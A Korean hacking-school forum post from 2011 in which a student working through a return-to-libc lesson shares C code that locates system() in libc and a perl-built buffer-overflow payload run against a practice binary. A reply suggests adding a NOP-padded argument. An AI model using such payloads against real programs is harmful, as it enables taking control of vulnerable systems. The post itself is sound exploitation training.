시스템 해킹

 1576, 1/79 회원가입  로그인  
   vbvbdldh
   시스템 해킹 23강에서 sh: syntax error near unexpercted token '(이상한문자)'

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=1549 [복사]


--------------------------------------------------

[student@localhost chapter_21]$ /bin/bash2

--------------------------------------------------

--------------------------------------------------

[student@localhost chapter_21]$ export PATH=$PATH:.

--------------------------------------------------

-------------------------------------------------------------

[student@localhost chapter_21]$ cat > addr_of_system.c
#include <dlfcn.h>

int main()
{
   long addr;
   void *handle;

   handle = dlopen("/lib/libc.so.6", RTLD_LAZY);
   addr = (long)dlsym(handle, "system");
   printf("system() is at 0x%x\n", addr);

}
(컨트럴+D 입력)
[student@localhost chapter_21]$
[student@localhost chapter_21]$ gcc -o ./addr_of_system addr_of_system.c -lc -ldl
[student@localhost chapter_21]$ ./addr_of_system
system() is at 0x40058ae0
[student@localhost chapter_21]$

--------------------------------------------------------------

-> system의 주소를 알아낸 뒤
----------------------------------------------------------------------------------------------------------

[student@localhost chapter_21]$ ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'`
your input is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?@
sh: ?풠?? command not found
Segmentation fault
[student@localhost chapter_21]$

----------------------------------------------------------------------------------------------------------

위에 명령을 쳤을때 강좌에서는 위 처럼 뜨는데 반해 저는 아래와같은 문구가 뜹니다.

your input is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(이상한 문자)
sh: syntax error near unexpercted token '(이상한문자)'
sh: -c: line 1: '(이상한문자)'
Segmentation fault

어떻게 해야 강좌처럼 될 까요?

  Hit : 4310     Date : 2011/12/13 03:05



    
phpmyadmin 운나쁘게도 괄호가 파일명에 포함되셨네요... 뒤에 인자수를 늘리셔서 스택영역을 늘리시면 system함수가 가리키는 값도 달라질수있습니다. 2011/12/27  
phpmyadmin ex) ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'` `perl -e 'print "\x90"*260'` 2011/12/27